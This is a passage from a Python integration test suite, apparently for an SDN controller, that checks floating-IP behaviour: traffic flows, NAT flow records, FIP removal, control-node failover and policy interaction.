connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn1_vm1_traffic_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(
fip_id1, vn1_vm1_traffic_fixture, fvn1_fixture)
if not vn1_vm1_traffic_fixture.ping_with_certainty(fvn1_vm1_traffic_fixture.vm_ip):
result = result and False
# Send UDP traffic
fvn1_vm1_traffic_fixture.install_pkg("Traffic")
vn1_vm1_traffic_fixture.install_pkg("Traffic")
# Verify Traffic ---
# Start Traffic
traffic_obj = {}
startStatus = {}
stopStatus = {}
traffic_proto_l = ['udp']
total_streams = {}
total_streams['udp'] = 1
dpi = 9100
proto = 'udp'
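        # dpi (9100) is used as the streams' destination start port (start_port in
        # startTraffic below); the sender's source port side defaults to 8000, which
        # is why udp_src further down is 8000.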
for proto in traffic_proto_l:
traffic_obj[proto] = {}
startStatus[proto] = {}
traffic_obj[proto] = self.useFixture(
traffic_tests.trafficTestFixture(self.connections))
# def startTraffic (self, name=name, num_streams= 1, start_port= 9100, tx_vm_fixture= None, rx_vm_fixture= None, stream_proto= 'udp', \
# packet_size= 100, start_sport= 8000,
# total_single_instance_streams= 20):
startStatus[proto] = traffic_obj[proto].startTraffic(
num_streams=total_streams[proto], start_port=dpi,
tx_vm_fixture=vn1_vm1_traffic_fixture, rx_vm_fixture=fvn1_vm1_traffic_fixture, stream_proto=proto)
self.logger.info("Status of start traffic : %s, %s, %s" %
(proto, vn1_vm1_traffic_fixture.vm_ip, startStatus[proto]))
if startStatus[proto]['status'] != True:
result = False
self.logger.info("-" * 80)
# Poll live traffic
traffic_stats = {}
self.logger.info("Poll live traffic and get status..")
for proto in traffic_proto_l:
traffic_stats = traffic_obj[proto].getLiveTrafficStats()
err_msg = "Traffic disruption is seen: details: "
#self.assertEqual(traffic_stats['status'], True, err_msg)
assert(traffic_stats['status'] == True), err_msg
self.logger.info("-" * 80)
# Verify Flow records here
inspect_h1 = self.agent_inspect[vn1_vm1_traffic_fixture.vm_node_ip]
inspect_h2 = self.agent_inspect[fvn1_vm1_traffic_fixture.vm_node_ip]
flow_rec1 = None
udp_src = unicode(8000)
dpi = unicode(dpi)
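        # The flow-record lookups below pass sport/dport as strings and use
        # protocol '17', the IANA protocol number for UDP.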
# Verify Ingress Traffic
self.logger.info('Verifying Ingress Flow Record')
flow_rec1 = inspect_h1.get_vna_fetchflowrecord(vrf=vn1_vm1_traffic_fixture.agent_vrf_objs['vrf_list'][0][
'ucindex'], sip=vn1_vm1_traffic_fixture.vm_ip, dip=fvn1_vm1_traffic_fixture.vm_ip, sport=udp_src, dport=dpi, protocol='17')
if flow_rec1 is not None:
self.logger.info('Verifying NAT in flow records')
match = inspect_h1.match_item_in_flowrecord(
flow_rec1, 'nat', 'enabled')
if match is False:
self.logger.error(
'Test Failed. NAT is not enabled in given flow. Flow details %s' % (flow_rec1))
result = result and False
self.logger.info('Verifying traffic direction in flow records')
match = inspect_h1.match_item_in_flowrecord(
flow_rec1, 'direction', 'ingress')
if match is False:
self.logger.error(
'Test Failed. Traffic direction is wrong should be ingress. Flow details %s' % (flow_rec1))
result = result and False
else:
self.logger.error(
'Test Failed. Required ingress Traffic flow not found')
result = result and False
# Verify Egress Traffic
# Check VMs are in same agent or not. Need to compute source vrf
# accordingly
if vn1_vm1_traffic_fixture.vm_node_ip != fvn1_vm1_traffic_fixture.vm_node_ip:
source_vrf = vn1_vm1_traffic_fixture.agent_vrf_objs[
'vrf_list'][0]['ucindex']
else:
vrf_list = inspect_h1.get_vna_vrf_objs(
vn_name=fvn1_vm1_traffic_fixture.vn_name)
source_vrf = vrf_list['vrf_list'][0]['ucindex']
self.logger.info('Verifying Egress Flow Records')
flow_rec2 = inspect_h1.get_vna_fetchflowrecord(
vrf=source_vrf, sip=fvn1_vm1_traffic_fixture.vm_ip, dip=fip_fixture1.fip[fip_id1], sport=dpi, dport=udp_src, protocol='17')
if flow_rec2 is not None:
self.logger.info('Verifying NAT in flow records')
match = inspect_h1.match_item_in_flowrecord(
flow_rec2, 'nat', 'enabled')
if match is False:
self.logger.error(
'Test Failed. NAT is not enabled in given flow. Flow details %s' % (flow_rec2))
result = result and False
self.logger.info('Verifying traffic direction in flow records')
match = inspect_h1.match_item_in_flowrecord(
flow_rec2, 'direction', 'egress')
if match is False:
                    self.logger.error(
                        'Test Failed. Traffic direction is wrong, should be egress. Flow details %s' % (flow_rec2))
result = result and False
else:
self.logger.error(
'Test Failed. Required Egress Traffic flow not found')
result = result and False
# Stop Traffic
self.logger.info("Proceed to stop traffic..")
self.logger.info("-" * 80)
for proto in traffic_proto_l:
stopStatus[proto] = {}
stopStatus[proto] = traffic_obj[proto].stopTraffic()
#if stopStatus[proto] != []: msg.append(stopStatus[proto]); result= False
if stopStatus[proto] != []:
result = False
self.logger.info("Status of stop traffic for proto %s is %s" %
(proto, stopStatus[proto]))
self.logger.info("-" * 80)
if not result:
self.logger.error(
'Test Failed. Floating IP test with traffic failed')
assert result
return result
# end test_fip_with_traffic
@preposttest_wrapper
def test_removal_of_fip_with_traffic(self):
'''Test the removal of FIP with back ground traffic. Verify the impact on flow also.
'''
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
fvn1_vm1_traffic_fixture = self.res.fvn1_vm1_traffic_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_traffic_name = self.res.fvn1_vm1_traffic_name
vn1_fixture = self.res.vn1_fixture
vn1_vm1_traffic_fixture = self.res.vn1_vm1_traffic_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_traffic_name = self.res.vn1_vm1_traffic_name
assert fvn1_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert fvn1_vm1_traffic_fixture.verify_on_setup()
assert vn1_vm1_traffic_fixture.verify_on_setup()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn1_vm1_traffic_fixture.vm_id)
assert fip_fixture1.verify_fip(
fip_id1, vn1_vm1_traffic_fixture, fvn1_fixture)
if not vn1_vm1_traffic_fixture.ping_with_certainty(fvn1_vm1_traffic_fixture.vm_ip):
result = result and False
fvn1_vm1_traffic_fixture.wait_till_vm_is_up()
vn1_vm1_traffic_fixture.wait_till_vm_is_up()
# Install traffic pkg in VM
vn1_vm1_traffic_fixture.install_pkg("Traffic")
fvn1_vm1_traffic_fixture.install_pkg("Traffic")
# Verify Traffic ---
# Start Traffic
traffic_obj = {}
startStatus = {}
stopStatus = {}
traffic_proto_l = ['udp']
total_streams = {}
total_streams['udp'] = 1
dpi = 9100
proto = 'udp'
for proto in traffic_proto_l:
traffic_obj[proto] = {}
startStatus[proto] = {}
traffic_obj[proto] = self.useFixture(
traffic_tests.trafficTestFixture(self.connections))
# def startTraffic (self, name=name, num_streams= 1, start_port= 9100, tx_vm_fixture= None, rx_vm_fixture= None, stream_proto= 'udp', \
# packet_size= 100, start_sport= 8000,
# total_single_instance_streams= 20):
startStatus[proto] = traffic_obj[proto].startTraffic(
num_streams=total_streams[proto], start_port=dpi,
tx_vm_fixture=vn1_vm1_traffic_fixture, rx_vm_fixture=fvn1_vm1_traffic_fixture, stream_proto=proto)
self.logger.info("Status of start traffic : %s, %s, %s" %
(proto, vn1_vm1_traffic_fixture.vm_ip, startStatus[proto]))
#if startStatus[proto] != None: msg.append(startStatus[proto]); result= False
if startStatus[proto]['status'] != True:
result = False
self.logger.info("-" * 80)
# Poll live traffic
traffic_stats = {}
self.logger.info("Poll live traffic and get status..")
for proto in traffic_proto_l:
traffic_stats = traffic_obj[proto].getLiveTrafficStats()
err_msg = "Traffic disruption is seen: details: "
#self.assertEqual(traffic_stats['status'], True, err_msg)
assert(traffic_stats['status'] == True), err_msg
self.logger.info("-" * 80)
        self.logger.info(
            "Removing/disassociating the FIP now. Traffic should stop")
fip_fixture1.disassoc_and_delete_fip(fip_id1)
sleep(2)
# Poll live traffic
traffic_stats = {}
        self.logger.info(
            "Traffic is expected to stop flowing as the FIP is removed. Disruption expected.")
for proto in traffic_proto_l:
traffic_stats = traffic_obj[proto].getLiveTrafficStats()
err_msg = "Traffic NOT stopped after FIP removal "
#self.assertEqual(traffic_stats['status'], False, err_msg)
assert(traffic_stats['status'] == False), err_msg
self.logger.info("-" * 80)
# Verify Flow records here
inspect_h1 = self.agent_inspect[vn1_vm1_traffic_fixture.vm_node_ip]
inspect_h2 = self.agent_inspect[fvn1_vm1_traffic_fixture.vm_node_ip]
flow_rec1 = None
udp_src = unicode(8000)
dpi = unicode(dpi)
# Verify Ingress Traffic
self.logger.info('Verifying Ingress Flow Record')
flow_rec1 = inspect_h1.get_vna_fetchflowrecord(vrf=vn1_vm1_traffic_fixture.agent_vrf_objs['vrf_list'][0][
'ucindex'], sip=vn1_vm1_traffic_fixture.vm_ip, dip=fvn1_vm1_traffic_fixture.vm_ip, sport=udp_src, dport=dpi, protocol='17')
if flow_rec1 is not None:
match = inspect_h1.match_item_in_flowrecord(
flow_rec1, 'short_flow', 'yes')
if match is False:
self.logger.error(
'Test Failed. After removal of FIP flow type should be short_flow. Flow details %s' % (flow_rec1))
result = result and False
match = inspect_h1.match_item_in_flowrecord(
flow_rec1, 'dst_vn', '__UNKNOWN__')
if match is False:
                self.logger.error(
                    'Test Failed. After removal of FIP the destination VN should be unknown. Flow details %s' % (flow_rec1))
result = result and False
# Verify Egress Traffic
self.logger.info('Verifying Egress Flow Records')
# Check VMs are in same agent or not. Need to compute source vrf
# accordingly
if vn1_vm1_traffic_fixture.vm_node_ip != fvn1_vm1_traffic_fixture.vm_node_ip:
source_vrf = vn1_vm1_traffic_fixture.agent_vrf_objs[
'vrf_list'][0]['ucindex']
else:
vrf_list = inspect_h1.get_vna_vrf_objs(
vn_name=fvn1_vm1_traffic_fixture.vn_name)
source_vrf = vrf_list['vrf_list'][0]['ucindex']
flow_rec2 = inspect_h1.get_vna_fetchflowrecord(
vrf=source_vrf, sip=fvn1_vm1_traffic_fixture.vm_ip, dip=fip_fixture1.fip[fip_id1], sport=dpi, dport=udp_src, protocol='17')
if flow_rec2 is not None:
self.logger.error(
'Test Failed. Egress Flow records entry should be removed after removal of FIP. It still exists.')
self.logger.error('Flow record entry: %s' % (flow_rec2))
result = result and False
else:
self.logger.info(
'Verification successful. Egress flow records removed')
flow_rec3 = inspect_h1.get_vna_fetchflowrecord(
vrf=source_vrf, sip=fvn1_vm1_traffic_fixture.vm_ip, dip=vn1_vm1_traffic_fixture.vm_ip, sport=dpi, dport=udp_src, protocol='17')
if flow_rec3 is not None:
match = inspect_h1.match_item_in_flowrecord(
flow_rec3, 'short_flow', 'yes')
if match is False:
self.logger.error(
'Test Failed. After removal of FIP flow type should be short_flow. Flow details %s' % (flow_rec3))
result = result and False
match = inspect_h1.match_item_in_flowrecord(
flow_rec3, 'dst_vn', '__UNKNOWN__')
if match is False:
                self.logger.error(
                    'Test Failed. After removal of FIP the destination VN should be unknown. Flow details %s' % (flow_rec3))
result = result and False
# Stop Traffic
self.logger.info("Proceed to stop traffic..")
self.logger.info("-" * 80)
for proto in traffic_proto_l:
stopStatus[proto] = {}
stopStatus[proto] = traffic_obj[proto].stopTraffic()
self.logger.info("-" * 80)
if not result:
self.logger.error(
'Test Failed. Traffic not stopped/flow still exists after FIP removal')
assert result
return result
# end test_removal_of_fip_with_traffic
@preposttest_wrapper
def test_traffic_with_control_node_switchover(self):
''' Stop the control node and check peering with agent fallback to other control node.
'''
if len(set(self.inputs.bgp_ips)) < 2:
            raise self.skipTest(
                "Skipping test. At least 2 control nodes are required to run this test")
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
fvn1_vm1_traffic_fixture = self.res.fvn1_vm1_traffic_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_traffic_name = self.res.fvn1_vm1_traffic_name
vn1_fixture = self.res.vn1_fixture
vn1_vm1_traffic_fixture = self.res.vn1_vm1_traffic_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_traffic_name = self.res.vn1_vm1_traffic_name
assert fvn1_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert fvn1_vm1_traffic_fixture.verify_on_setup()
assert vn1_vm1_traffic_fixture.verify_on_setup()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn1_vm1_traffic_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(
fip_id1, vn1_vm1_traffic_fixture, fvn1_fixture)
if not vn1_vm1_traffic_fixture.ping_with_certainty(fvn1_vm1_traffic_fixture.vm_ip):
result = result and False
# Figuring the active control node
active_controller = None
inspect_h = self.agent_inspect[vn1_vm1_traffic_fixture.vm_node_ip]
agent_xmpp_status = inspect_h.get_vna_xmpp_connection_status()
for entry in agent_xmpp_status:
if entry['cfg_controller'] == 'Yes':
active_controller = entry['controller_ip']
self.logger.info('Active control node from the Agent %s is %s' %
(vn1_vm1_traffic_fixture.vm_node_ip, active_controller))
fvn1_vm1_traffic_fixture.wait_till_vm_is_up()
vn1_vm1_traffic_fixture.wait_till_vm_is_up()
# Install traffic pkg in VM
vn1_vm1_traffic_fixture.install_pkg("Traffic")
fvn1_vm1_traffic_fixture.install_pkg("Traffic")
# Start Traffic
traffic_obj = {}
startStatus = {}
stopStatus = {}
traffic_proto_l = ['icmp']
total_streams = {}
        total_streams['icmp'] = 1
dpi = 9100
proto = 'icmp'
for proto in traffic_proto_l:
traffic_obj[proto] = {}
startStatus[proto] = {}
traffic_obj[proto] = self.useFixture(
traffic_tests.trafficTestFixture(self.connections))
startStatus[proto] = traffic_obj[proto].startTraffic(
num_streams=total_streams[proto], start_port=dpi,
tx_vm_fixture=vn1_vm1_traffic_fixture, rx_vm_fixture=fvn1_vm1_traffic_fixture, stream_proto=proto)
self.logger.info("Status of start traffic : %s, %s, %s" %
(proto, vn1_vm1_traffic_fixture.vm_ip, startStatus[proto]))
if startStatus[proto]['status'] != True:
result = False
self.logger.info("-" * 80)
# Poll live traffic
traffic_stats = {}
self.logger.info("Poll live traffic and get status..")
for proto in traffic_proto_l:
traffic_stats = traffic_obj[proto].getLiveTrafficStats()
err_msg = "Traffic disruption is seen: details: "
#self.assertEqual(traffic_stats['status'], True, err_msg)
assert(traffic_stats['status'] == True), err_msg
self.logger.info("-" * 80)
# Stop on Active node
        self.logger.info('Stopping the Control service on %s' %
                         (active_controller))
self.inputs.stop_service('contrail-control', [active_controller])
sleep(5)
# Check the control node shifted to other control node
new_active_controller = None
new_active_controller_state = None
inspect_h = self.agent_inspect[vn1_vm1_traffic_fixture.vm_node_ip]
agent_xmpp_status = inspect_h.get_vna_xmpp_connection_status()
for entry in agent_xmpp_status:
if entry['cfg_controller'] == 'Yes':
new_active_controller = entry['controller_ip']
new_active_controller_state = entry['state']
self.logger.info('Active control node from the Agent %s is %s' %
(vn1_vm1_traffic_fixture.vm_node_ip, new_active_controller))
if new_active_controller == active_controller:
            self.logger.error(
                'Control node switchover failed. Old active control node was %s and new active control node is %s' %
                (active_controller, new_active_controller))
result = False
if new_active_controller_state != 'Established':
self.logger.error(
'Agent does not have Established XMPP connection with Active control node')
result = result and False
# Verify Flow records here
inspect_h1 = self.agent_inspect[vn1_vm1_traffic_fixture.vm_node_ip]
inspect_h2 = self.agent_inspect[fvn1_vm1_traffic_fixture.vm_node_ip]
flow_rec1 = None
udp_src = unicode(8000)
dpi = unicode(dpi)
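        # For the ICMP streams the flow lookups below use protocol '1' (ICMP's IANA
        # number) with sport and dport of '0'.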
# Verify Ingress Traffic
self.logger.info('Verifying Ingress Flow Record')
flow_rec1 = inspect_h1.get_vna_fetchflowrecord(vrf=vn1_vm1_traffic_fixture.agent_vrf_objs['vrf_list'][0][
'ucindex'], sip=vn1_vm1_traffic_fixture.vm_ip, dip=fvn1_vm1_traffic_fixture.vm_ip, sport='0', dport='0', protocol='1')
if flow_rec1 is not None:
self.logger.info('Verifying NAT in flow records')
match = inspect_h1.match_item_in_flowrecord(
flow_rec1, 'nat', 'enabled')
if match is False:
self.logger.error(
'Test Failed. NAT is not enabled in given flow. Flow details %s' % (flow_rec1))
result = result and False
self.logger.info('Verifying traffic direction in flow records')
match = inspect_h1.match_item_in_flowrecord(
flow_rec1, 'direction', 'ingress')
if match is False:
self.logger.error(
'Test Failed. Traffic direction is wrong should be ingress. Flow details %s' % (flow_rec1))
result = result and False
else:
self.logger.error(
'Test Failed. Required ingress Traffic flow not found')
result = result and False
# Verify Egress Traffic
# Check VMs are in same agent or not. Need to compute source vrf
# accordingly
if vn1_vm1_traffic_fixture.vm_node_ip != fvn1_vm1_traffic_fixture.vm_node_ip:
source_vrf = vn1_vm1_traffic_fixture.agent_vrf_objs[
'vrf_list'][0]['ucindex']
else:
vrf_list = inspect_h1.get_vna_vrf_objs(
vn_name=fvn1_vm1_traffic_fixture.vn_name)
source_vrf = vrf_list['vrf_list'][0]['ucindex']
self.logger.info('Verifying Egress Flow Records')
flow_rec2 = inspect_h1.get_vna_fetchflowrecord(
vrf=source_vrf, sip=fvn1_vm1_traffic_fixture.vm_ip, dip=fip_fixture1.fip[fip_id1], sport='0', dport='0', protocol='1')
if flow_rec2 is not None:
self.logger.info('Verifying NAT in flow records')
match = inspect_h1.match_item_in_flowrecord(
flow_rec2, 'nat', 'enabled')
if match is False:
self.logger.error(
'Test Failed. NAT is not enabled in given flow. Flow details %s' % (flow_rec2))
result = result and False
self.logger.info('Verifying traffic direction in flow records')
match = inspect_h1.match_item_in_flowrecord(
flow_rec2, 'direction', 'egress')
if match is False:
self.logger.error(
'Test Failed. Traffic direction is wrong should be Egress. Flow details %s' % (flow_rec1))
result = result and False
else:
self.logger.error(
'Test Failed. Required Egress Traffic flow not found')
result = result and False
# Stop Traffic
self.logger.info("Proceed to stop traffic..")
self.logger.info("-" * 80)
for proto in traffic_proto_l:
stopStatus[proto] = {}
stopStatus[proto] = traffic_obj[proto].stopTraffic()
#if stopStatus[proto] != []: msg.append(stopStatus[proto]); result= False
if stopStatus[proto] != []:
result = False
self.logger.info("Status of stop traffic for proto %s is %s" %
(proto, stopStatus[proto]))
self.logger.info("-" * 80)
# Start the control node service again
self.logger.info('Starting the Control service in %s' %
(active_controller))
self.inputs.start_service('contrail-control', [active_controller])
sleep(10)
# Check the BGP peering status from the currently active control node
        self.logger.info(
            'Checking the BGP peering from the new active controller %s' %
            (new_active_controller))
cn_bgp_entry = self.cn_inspect[
new_active_controller].get_cn_bgp_neigh_entry()
sleep(5)
for entry in cn_bgp_entry:
if entry['state'] != 'Established':
result = result and False
self.logger.error(
'With Peer %s peering is not Established. Current State %s ' %
(entry['peer'], entry['state']))
# fip_fixture1.disassoc_and_delete_fip(fip_id1)
if not result:
self.logger.error('Switchover of control node failed')
assert result
return True
# end test_traffic_with_control_node_switchover
@preposttest_wrapper
def test_fip_in_uve(self):
'''Test analytics information for FIP
'''
result = True
fip_pool_name = 'some-pool1'
fvn_fixture = self.res.fvn1_fixture
vn1_fixture = self.res.vn1_fixture
vn1_vm1_fixture = self.res.vn1_vm1_fixture
fvn_subnets = self.res.fvn1_subnets
vm1_name = self.res.vn1_vm1_name
vn1_name = self.res.vn1_name
vn1_subnets = self.res.vn1_subnets
assert fvn_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name, vn_id=fvn_fixture.vn_id))
assert fip_fixture.verify_on_setup()
fip_id = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vn1_vm1_fixture.vm_id)
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)
assert fip_fixture.verify_fip(fip_id, vn1_vm1_fixture, fvn_fixture)
# Verify FIP details in analytics UVE
self.logger.info("Verifying FIP details in UVE")
result = fip_fixture.verify_fip_in_uve(
fip_fixture.fip[fip_id], vn1_vm1_fixture, fvn_fixture)
# fip_fixture.disassoc_and_delete_fip(fip_id)
if not result:
self.logger.error('FIP verification in UVE has failed')
assert result
return True
# end test_fip_in_uve
@preposttest_wrapper
def test_vm_restart_with_fip(self):
'''Test restart of VM with Floating IP.
'''
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
fvn1_vm1_fixture = self.res.fvn1_vm1_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_name = self.res.fvn1_vm1_name
vn1_fixture = self.res.vn1_fixture
vn1_vm1_fixture = self.res.vn1_vm1_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_name = self.res.vn1_vm1_name
assert fvn1_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert fvn1_vm1_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
        fvn1_vm1_fixture.wait_till_vm_is_up()
        vn1_vm1_fixture.wait_till_vm_is_up()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn1_vm1_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(fip_id1, vn1_vm1_fixture, fvn1_fixture)
if not vn1_vm1_fixture.ping_with_certainty(fvn1_vm1_fixture.vm_ip):
result = result and False
# Restart the VM here
self.logger.info('Rebooting the VM %s' % (vn1_vm1_name))
cmd_to_reboot_vm = ['reboot']
vn1_vm1_fixture.run_cmd_on_vm(cmds=cmd_to_reboot_vm)
        vn1_vm1_fixture.wait_till_vm_is_up()
assert vn1_vm1_fixture.verify_on_setup()
self.logger.info('Verify the connectivity to other VN via floating IP')
if not vn1_vm1_fixture.ping_with_certainty(fvn1_vm1_fixture.vm_ip):
result = result and False
if not result:
self.logger.error('Test VM restart with FIP failed')
assert result
return True
# end test_vm_restart_with_fip
@preposttest_wrapper
def test_vn_info_in_agent_with_fip(self):
        '''Test that VN information is available in the agent when a FIP is allocated.
'''
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
fvn1_vm1_fixture = self.res.fvn1_vm1_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_name = self.res.fvn1_name
fvn1_vm1_name = self.res.fvn1_vm1_name
vn1_fixture = self.res.vn1_fixture
vn1_vm1_fixture = self.res.vn1_vm1_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_name = self.res.vn1_vm1_name
assert fvn1_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert fvn1_vm1_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
        fvn1_vm1_fixture.wait_till_vm_is_up()
        vn1_vm1_fixture.wait_till_vm_is_up()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
# Checking the allocating VN info in borrower VM agent.
        self.logger.info(
            'Checking whether the VN information of the FIP-allocating VN is already present in the agent of the borrower VM')
inspect_h1 = self.agent_inspect[vn1_vm1_fixture.vm_node_ip]
vn_fq_name = inspect_h1.get_vna_vn(vn_name=fvn1_name)
if vn_fq_name is None:
self.logger.info('VN info for %s is not present in agent %s' %
(fvn1_name, vn1_vm1_fixture.vm_node_ip))
else:
            self.logger.error(
                'VN info for %s is already present in agent %s. Setup problem. Exiting the test here' %
                (fvn1_name, vn1_vm1_fixture.vm_node_ip))
            result = result and False
assert result
# Allocate the FIP here
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn1_vm1_fixture.vm_id)
#self.addCleanup( fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(fip_id1, vn1_vm1_fixture, fvn1_fixture)
if not vn1_vm1_fixture.ping_with_certainty(fvn1_vm1_fixture.vm_ip):
result = result and False
# Checking the allocating VN info in borrower VM agent.
vn_fq_name = inspect_h1.get_vna_vn(vn_name=fvn1_name)
if vn_fq_name is None:
self.logger.info(
'FIP allocating VN %s is not present in agent %s' %
(fvn1_name, vn1_vm1_fixture.vm_node_ip))
            result = result and False
fip_fixture1.disassoc_and_delete_fip(fip_id1)
assert result
else:
self.logger.info('VN info for %s is present in agent %s.' %
(fvn1_name, vn1_vm1_fixture.vm_node_ip))
        # Disassociate the FIP here
        self.logger.info('Disassociating the FIP %s from VM %s' %
(fip_fixture1.fip[fip_id1], vn1_vm1_name))
fip_fixture1.disassoc_and_delete_fip(fip_id1)
vn_fq_name = inspect_h1.get_vna_vn(vn_name=fvn1_name)
if vn_fq_name is None:
self.logger.info('VN info for %s is no more present in agent %s' %
(fvn1_name, vn1_vm1_fixture.vm_node_ip))
else:
self.logger.error(
'VN info for %s is still present in agent %s after removal of FIP' %
(fvn1_name, vn1_vm1_fixture.vm_node_ip))
            result = result and False
if not result:
self.logger.error('Test VN info in agent with FIP failed')
assert result
return True
# end test_vn_info_in_agent_with_fip
@preposttest_wrapper
def test_fip_with_policy(self):
        '''Test interaction of FIP with policy.
'''
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
fvn1_vm1_fixture = self.res.fvn1_vm1_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_name = self.res.fvn1_name
fvn1_vm1_name = self.res.fvn1_vm1_name
fvn2_fixture = self.res.fvn2_fixture
fvn2_vm1_fixture = self.res.fvn2_vm1_fixture
fvn2_subnets = self.res.fvn2_subnets
fvn2_name = self.res.fvn2_name
fvn2_vm1_name = self.res.fvn2_vm1_name
vn1_fixture = self.res.vn1_fixture
vn1_vm1_fixture = self.res.vn1_vm1_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_name = self.res.vn1_vm1_name
vn2_fixture = self.res.vn2_fixture
vn2_vm1_fixture = self.res.vn2_vm1_fixture
vn2_subnets = self.res.vn2_subnets
vn2_vm1_name = self.res.vn2_vm1_name
assert fvn1_fixture.verify_on_setup()
assert fvn2_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert vn2_fixture.verify_on_setup()
assert fvn1_vm1_fixture.verify_on_setup()
assert fvn2_vm1_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
assert vn2_vm1_fixture.verify_on_setup()
# Apply policy in between VN
policy1_name = 'policy1'
policy2_name = 'policy2'
rules = [
{
'direction': '<>', 'simple_action': 'pass',
'protocol': 'icmp',
'source_network': fvn1_name,
'dest_network': fvn2_name,
},
]
rev_rules = [
{
'direction': '<>', 'simple_action': 'pass',
'protocol': 'icmp',
'source_network': fvn2_name,
'dest_network': fvn1_name,
},
]
# Policy
policy1_fixture = self.useFixture(PolicyFixture(
policy_name=policy1_name, rules_list=rules, inputs=self.inputs, connections=self.connections))
policy2_fixture = self.useFixture(PolicyFixture(
policy_name=policy2_name, rules_list=rev_rules, inputs=self.inputs, connections=self.connections))
self.logger.info('Apply policy between VN %s and %s' %
(fvn1_name, fvn2_name))
fvn1_fixture.bind_policies(
[policy1_fixture.policy_fq_name], fvn1_fixture.vn_id)
self.addCleanup(fvn1_fixture.unbind_policies,
fvn1_fixture.vn_id, [policy1_fixture.policy_fq_name])
fvn2_fixture.bind_policies(
[policy2_fixture.policy_fq_name], fvn2_fixture.vn_id)
self.addCleanup(fvn2_fixture.unbind_policies,
fvn2_fixture.vn_id, [policy2_fixture.policy_fq_name])
self.logger.info('Ping from %s to %s' % (fvn1_vm1_name, fvn2_vm1_name))
if not fvn1_vm1_fixture.ping_with_certainty(fvn2_vm1_fixture.vm_ip):
result = result and False
# FIP
self.logger.info("Configuring floating IP now")
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn1_vm1_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(fip_id1, vn1_vm1_fixture, fvn1_fixture)
fip_id2 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn2_vm1_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id2)
assert fip_fixture1.verify_fip(fip_id2, vn2_vm1_fixture, fvn1_fixture)
        self.logger.info(
            'Ping from VM %s to the other VM in a different network using FIP %s' %
            (vn1_vm1_name, fip_fixture1.fip[fip_id2]))
if not vn1_vm1_fixture.ping_with_certainty(fip_fixture1.fip[fip_id2]):
result = result and False
        self.logger.info('Ping from VM %s to IP %s of VM %s' %
                         (vn1_vm1_name, fvn2_vm1_fixture.vm_ip, fvn2_vm1_name))
